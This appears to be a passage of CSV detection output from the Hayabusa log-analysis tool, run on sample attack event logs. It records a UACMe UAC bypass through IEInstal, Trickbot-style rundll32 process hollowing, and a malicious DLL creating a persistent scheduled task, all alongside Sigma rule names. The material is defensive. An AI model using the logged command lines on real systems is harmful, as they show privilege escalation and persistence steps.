SHA1=4DFA874CE545B22B3AAFF93BD143C6E463996698,MD5=661D7257C25198B973361117467616BE,SHA256=870691CFC9C98866B2AF2E7E48ED5FD5F1D14CFE0E3E9C630BC472FC0A013D0B,IMPHASH=F31CA5C7DD56008F53D4F3926CF37891",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:54.814 +09:00,DESKTOP-NTSSLJD,7,info,Evas,Suspicious Load of Advapi31.dll,,rules/sigma/image_load/image_load_susp_advapi32_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:55.102 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 8264 | PGUID: 23F38D93-CF1E-5F8E-C908-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:55.388 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:55.390 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:55.392 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,info,,File Created,Path: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,high,Evas | PrivEsc,UAC Bypass Using IEInstal - File,,rules/sigma/file_event/sysmon_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:55.461 +09:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\dfcc1807-03a1-4ae1-ab29-5675b285edea\consent.exe.dat | Process: C:\Program Files\Internet Explorer\IEInstal.exe | User: DESKTOP-NTSSLJD\den | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:55.577 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 3760 | PGUID: 23F38D93-CF1F-5F8E-CB08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:56.004 +09:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Windows\system32\DllHost.exe | User: DESKTOP-NTSSLJD\den | PID: 9444 | PGUID: 23F38D93-CF1F-5F8E-CC08-000000000C00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:56.090 +09:00,DESKTOP-NTSSLJD,11,info,,File Created,Path: C:\Users\den\AppData\Local\Temp\[1]consent.exe | Process: C:\Windows\explorer.exe | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:56.218 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 112 | PGUID: 23F38D93-CF20-5F8E-CD08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: ""C:\Program Files\Internet Explorer\IEInstal.exe"" -Embedding | LID: 0x17eca2 | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Hash: SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Using IEInstal - Process,,rules/sigma/process_creation/proc_creation_win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:56.517 +09:00,DESKTOP-NTSSLJD,7,info,Evas,Suspicious Load of Advapi31.dll,,rules/sigma/image_load/image_load_susp_advapi32_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:56.531 +09:00,DESKTOP-NTSSLJD,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1073,technique_name=DLL Side-Loading | Image: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Company: Integrity Investment LLC | Signed: false | Signature: Unavailable | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Hash: SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1059.003,technique_name=Windows Command Shell | Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | LID: 0x17eca2 | PID: 9620 | PGUID: 23F38D93-CF20-5F8E-D008-000000000C00 | Hash: SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,10,high,,Process Access_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Src Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 6896 | Src PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Tgt PID: 9620 | Tgt PGUID: 23F38D93-CF20-5F8E-D008-000000000C00",rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:56.590 +09:00,DESKTOP-NTSSLJD,5,info,,Process Terminated,Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:56.731 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 7716 | PGUID: 23F38D93-CF20-5F8E-CF08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:56.999 +09:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Windows\system32\DllHost.exe | User: DESKTOP-NTSSLJD\den | PID: 9444 | PGUID: 23F38D93-CF1F-5F8E-CC08-000000000C00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:57.031 +09:00,DESKTOP-NTSSLJD,5,info,,Process Terminated,Process: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:51:01.476 +09:00,DESKTOP-NTSSLJD,22,info,,DNS Query,Query: wpad | Result: - | Process: C:\Windows\System32\svchost.exe | PID: 2428 | PGUID: 23F38D93-ABAC-5F8E-3900-000000000C00,rules/hayabusa/sysmon/events/22_DNS-Query.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\wermgr.exe | Process: C:\Windows\System32\wermgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe c:\temp\winfire.dll,DllRegisterServer | LID: 0x910e0 | PID: 5600 | PGUID: 747F3D96-659E-5F8F-0000-001064E03300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,critical,Exec,Trickbot Malware Activity,,rules/sigma/process_creation/proc_creation_win_malware_trickbot_wermgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\SysWOW64\rundll32.exe | Tgt Process: C:\Windows\system32\wermgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2372 | Src PGUID: 747F3D96-659B-5F8F-0000-001026C33300 | Tgt PID: 5600 | Tgt PGUID: 747F3D96-659E-5F8F-0000-001064E03300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
2020-10-21 07:35:26.755 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ? | LID: 0x3e4 | PID: 6748 | PGUID: 747F3D96-662E-5F8F-0000-001023353800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
2020-10-24 06:55:59.769 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe | URL: http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-24 06:57:29.217 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ? | LID: 0x3e4 | PID: 8796 | PGUID: 747F3D96-51C9-5F93-0000-001010175B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:57:34.745 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp1375\__tmp_rar_sfx_access_check_2914968 | Process: c:\Users\Public\test.tmp | PID: 7624 | PGUID: 747F3D96-51CD-5F93-0000-001073735B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:57:34.767 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp1375\d948 | Process: c:\Users\Public\test.tmp | PID: 7624 | PGUID: 747F3D96-51CD-5F93-0000-001073735B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:57:36.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Users\Public\test.tmp | LID: 0x8a585 | PID: 3396 | PGUID: 747F3D96-51D0-5F93-0000-001036A15B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:57:36.332 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 3396 | PGUID: 747F3D96-51D0-5F93-0000-001036A15B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:57:36.399 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | Process: C:\Windows\SysWOW64\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 | LID: 0x8a585 | PID: 5572 | PGUID: 747F3D96-51D0-5F93-0000-0010B2B35B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | Process: C:\Windows\SysWOW64\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | LID: 0x8a585 | PID: 8572 | PGUID: 747F3D96-51D0-5F93-0000-001079C05B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Add Scheduled Task From User AppData Temp,,rules/sigma/process_creation/proc_creation_win_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Exec,Suspicius Schtasks From Env Var Folder,,rules/sigma/process_creation/win_pc_susp_schtasks_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Add Scheduled Command Pattern,,rules/sigma/process_creation/proc_creation_win_susp_schtasks_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:07.601 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\svchost.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 3420 | Src PGUID: 747F3D96-4790-5F93-0000-001054282200 | Tgt PID: 5864 | Tgt PGUID: 747F3D96-4694-5F93-0000-001092F70900,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8a619 | PID: 7552 | PGUID: 747F3D96-51F9-5F93-0000-001003125E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 | LID: 0x8a619 | PID: 9116 | PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Call by Ordinal,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\Rundll32.exe | Tgt Process: C:\Windows\SysWOW64\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7552 | Src PGUID: 747F3D96-51F9-5F93-0000-001003125E00 | Tgt PID: 9116 | Tgt PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:21.695 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 | LID: 0x8a619 | PID: 7504 | PGUID: 747F3D96-51FD-5F93-0000-00103B425E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:21.696 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\SysWOW64\rundll32.exe | Tgt Process: C:\Windows\SysWOW64\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 9116 | Src PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00 | Tgt PID: 7504 | Tgt PGUID: 747F3D96-51FD-5F93-0000-00103B425E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:22.066 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" DATAUS~1.DLL f8755 4624665222 rd | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 | LID: 0x8a619 | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:22.364 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\data.enc | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:22.391 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\config.xml | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 22:15:50.672 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-24 22:53:41.949 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amaWj.img?w=100&h=100&m=6&tilesize=medium&x=1912&y=840&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
